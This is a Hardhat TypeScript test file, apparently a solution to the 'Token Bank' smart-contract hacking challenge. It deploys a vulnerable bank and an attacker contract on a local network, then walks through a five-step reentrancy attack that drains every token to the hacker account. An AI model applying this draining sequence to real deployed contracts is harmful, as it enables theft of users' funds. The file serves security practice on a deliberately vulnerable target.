generated from nicobevilacqua/hardhat-solidity-typescript-boilerplate
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathTokenBankChallenge.test.ts
78 lines (57 loc) · 2.29 KB
/
TokenBankChallenge.test.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import { SignerWithAddress } from '@nomiclabs/hardhat-ethers/signers';
import { expect } from 'chai';
import { Contract } from 'ethers';
import { ethers, network } from 'hardhat';
const { utils } = ethers;
const TOTAL_TOKENS_SUPPLY = 1000000;
describe('TokenBankChallenge', () => {
let target: Contract;
let token: Contract;
let owner: SignerWithAddress;
let hacker: SignerWithAddress;
before(async () => {
[owner, hacker] = await ethers.getSigners();
const [targetFactory, tokenFactory] = await Promise.all([
ethers.getContractFactory('TokenBankChallenge'),
ethers.getContractFactory('SimpleERC223Token'),
]);
target = await targetFactory.deploy(hacker.address);
await target.deployed();
const tokenAddress = await target.token();
token = await tokenFactory.attach(tokenAddress);
await token.deployed();
console.log('Target deployed to:', target.address);
console.log('Token deployed to:', token.address);
});
it('Exploit', async () => {
const attackerFactory = await ethers.getContractFactory('TokenBankChallengeAttacker');
const attacker = await attackerFactory.connect(hacker).deploy(target.address);
await attacker.deployed();
console.log('Attacker deployed to:', attacker.address);
let tx;
console.log('1 - withdraw tokens to hacker account');
const hackerTokenBalance = await target.connect(hacker).balanceOf(hacker.address);
tx = await target.connect(hacker).withdraw(hackerTokenBalance);
await tx.wait();
console.log('2 - deposit tokens to attacker contract through target');
tx = await token
.connect(hacker)
['transfer(address,uint256)'](attacker.address, hackerTokenBalance);
await tx.wait();
console.log('3 - transfer tokens to target from contract');
tx = await attacker.connect(hacker).transfer();
await tx.wait();
console.log('4 - attack and reentrancy');
tx = await attacker.connect(hacker).attack();
await tx.wait();
console.log('5 - withdraw to owner');
tx = await attacker.connect(hacker).withdraw();
await tx.wait();
});
after(async () => {
expect(await token.balanceOf(target.address)).to.equal(0);
expect(await token.balanceOf(hacker.address)).to.equal(
utils.parseEther(TOTAL_TOKENS_SUPPLY.toString())
);
});
});